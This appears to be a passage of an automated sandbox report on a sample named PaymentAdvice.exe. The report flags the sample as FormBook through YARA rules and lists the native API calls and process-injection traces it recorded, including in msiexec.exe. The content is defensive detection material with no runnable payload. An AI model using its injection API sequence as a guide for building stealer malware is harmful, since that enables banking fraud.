          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404EA0
          Source: PaymentAdvice.exe, 00000000.00000002.237618535.0000000000A9A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.277986099.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.277857898.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.237687688.0000000002680000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.492784662.0000000000380000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.494092321.00000000007D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.278046129.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.PaymentAdvice.exe.2680000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PaymentAdvice.exe.2680000.1.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.277986099.00000000006B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.277986099.00000000006B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.277857898.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.277857898.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.237687688.0000000002680000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.237687688.0000000002680000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.492784662.0000000000380000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.492784662.0000000000380000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.494092321.00000000007D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.494092321.00000000007D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.278046129.00000000006E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.278046129.00000000006E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.PaymentAdvice.exe.2680000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PaymentAdvice.exe.2680000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.PaymentAdvice.exe.2680000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PaymentAdvice.exe.2680000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Executable has a suspicious name (potential lure to open the executable)Show sources
          Source: PaymentAdvice.exeStatic file information: Suspicious name
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: PaymentAdvice.exe
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_004181B0 NtCreateFile,2_2_004181B0
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00418260 NtReadFile,2_2_00418260
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_004182E0 NtClose,2_2_004182E0
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00418390 NtAllocateVirtualMemory,2_2_00418390
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_004181AB NtCreateFile,2_2_004181AB
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00418202 NtReadFile,2_2_00418202
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_004182DA NtClose,2_2_004182DA
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_0041838A NtAllocateVirtualMemory,2_2_0041838A
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A398F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_00A398F0
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39860 NtQuerySystemInformation,LdrInitializeThunk,2_2_00A39860
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39840 NtDelayExecution,LdrInitializeThunk,2_2_00A39840
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A399A0 NtCreateSection,LdrInitializeThunk,2_2_00A399A0
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_00A39910
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39A20 NtResumeThread,LdrInitializeThunk,2_2_00A39A20
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_00A39A00
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39A50 NtCreateFile,LdrInitializeThunk,2_2_00A39A50
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A395D0 NtClose,LdrInitializeThunk,2_2_00A395D0
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39540 NtReadFile,LdrInitializeThunk,2_2_00A39540
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A396E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_00A396E0
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_00A39660
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A397A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_00A397A0
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39780 NtMapViewOfSection,LdrInitializeThunk,2_2_00A39780
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39FE0 NtCreateMutant,LdrInitializeThunk,2_2_00A39FE0
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39710 NtQueryInformationToken,LdrInitializeThunk,2_2_00A39710
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A398A0 NtWriteVirtualMemory,2_2_00A398A0
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39820 NtEnumerateKey,2_2_00A39820
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A3B040 NtSuspendThread,2_2_00A3B040
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A399D0 NtCreateProcessEx,2_2_00A399D0
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39950 NtQueueApcThread,2_2_00A39950
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39A80 NtOpenDirectoryObject,2_2_00A39A80
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39A10 NtQuerySection,2_2_00A39A10
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A3A3B0 NtGetContextThread,2_2_00A3A3B0
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39B00 NtSetValueKey,2_2_00A39B00
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A395F0 NtQueryInformationFile,2_2_00A395F0
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39520 NtWaitForSingleObject,2_2_00A39520
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A3AD30 NtSetContextThread,2_2_00A3AD30
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39560 NtWriteFile,2_2_00A39560
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A396D0 NtCreateKey,2_2_00A396D0
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39610 NtEnumerateValueKey,2_2_00A39610
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39670 NtQueryInformationProcess,2_2_00A39670
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39650 NtQueryValueKey,2_2_00A39650
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39730 NtQueryVirtualMemory,2_2_00A39730
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A3A710 NtOpenProcessToken,2_2_00A3A710
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39760 NtOpenProcess,2_2_00A39760
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39770 NtSetInformationFile,2_2_00A39770
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A3A770 NtOpenThread,2_2_00A3A770
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_004181B0 NtCreateFile,2_1_004181B0
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_00418260 NtReadFile,2_1_00418260
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_004182E0 NtClose,2_1_004182E0
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_00418390 NtAllocateVirtualMemory,2_1_00418390
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_004181AB NtCreateFile,2_1_004181AB
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_00418202 NtReadFile,2_1_00418202
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_004182DA NtClose,2_1_004182DA
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_0041838A NtAllocateVirtualMemory,2_1_0041838A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679540 NtReadFile,LdrInitializeThunk,7_2_04679540
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046795D0 NtClose,LdrInitializeThunk,7_2_046795D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_04679660
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679650 NtQueryValueKey,LdrInitializeThunk,7_2_04679650
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046796E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_046796E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046796D0 NtCreateKey,LdrInitializeThunk,7_2_046796D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679710 NtQueryInformationToken,LdrInitializeThunk,7_2_04679710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679FE0 NtCreateMutant,LdrInitializeThunk,7_2_04679FE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679780 NtMapViewOfSection,LdrInitializeThunk,7_2_04679780
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679860 NtQuerySystemInformation,LdrInitializeThunk,7_2_04679860
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679840 NtDelayExecution,LdrInitializeThunk,7_2_04679840
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_04679910
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046799A0 NtCreateSection,LdrInitializeThunk,7_2_046799A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679A50 NtCreateFile,LdrInitializeThunk,7_2_04679A50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679560 NtWriteFile,7_2_04679560
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679520 NtWaitForSingleObject,7_2_04679520
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0467AD30 NtSetContextThread,7_2_0467AD30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046795F0 NtQueryInformationFile,7_2_046795F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679670 NtQueryInformationProcess,7_2_04679670
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679610 NtEnumerateValueKey,7_2_04679610
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679760 NtOpenProcess,7_2_04679760
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0467A770 NtOpenThread,7_2_0467A770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679770 NtSetInformationFile,7_2_04679770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679730 NtQueryVirtualMemory,7_2_04679730
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0467A710 NtOpenProcessToken,7_2_0467A710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046797A0 NtUnmapViewOfSection,7_2_046797A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0467B040 NtSuspendThread,7_2_0467B040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679820 NtEnumerateKey,7_2_04679820
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046798F0 NtReadVirtualMemory,7_2_046798F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046798A0 NtWriteVirtualMemory,7_2_046798A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679950 NtQueueApcThread,7_2_04679950
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046799D0 NtCreateProcessEx,7_2_046799D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679A20 NtResumeThread,7_2_04679A20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679A00 NtProtectVirtualMemory,7_2_04679A00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679A10 NtQuerySection,7_2_04679A10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679A80 NtOpenDirectoryObject,7_2_04679A80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679B00 NtSetValueKey,7_2_04679B00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0467A3B0 NtGetContextThread,7_2_0467A3B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_003981B0 NtCreateFile,7_2_003981B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00398260 NtReadFile,7_2_00398260
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_003982E0 NtClose,7_2_003982E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00398390 NtAllocateVirtualMemory,7_2_00398390
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_003981AB NtCreateFile,7_2_003981AB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00398202 NtReadFile,7_2_00398202
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_003982DA NtClose,7_2_003982DA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0039838A NtAllocateVirtualMemory,7_2_0039838A
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040314A
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 0_2_004046A70_2_004046A7
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_0041C0062_2_0041C006
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00408C4B2_2_00408C4B
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00408C502_2_00408C50
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_0041B7A22_2_0041B7A2
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A220A02_2_00A220A0
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC20A82_2_00AC20A8
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A0B0902_2_00A0B090
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC28EC2_2_00AC28EC
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00ACE8242_2_00ACE824
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AB10022_2_00AB1002
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A141202_2_00A14120
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009FF9002_2_009FF900
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC22AE2_2_00AC22AE
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2EBB02_2_00A2EBB0
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00ABDBD22_2_00ABDBD2
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC2B282_2_00AC2B28
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A0841F2_2_00A0841F
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00ABD4662_2_00ABD466
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A225812_2_00A22581
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A0D5E02_2_00A0D5E0
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC25DD2_2_00AC25DD
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC2D072_2_00AC2D07
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F0D202_2_009F0D20
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC1D552_2_00AC1D55
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC2EF72_2_00AC2EF7
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A16E302_2_00A16E30
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00ABD6162_2_00ABD616
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC1FF12_2_00AC1FF1
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_0041C0062_1_0041C006
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_004010<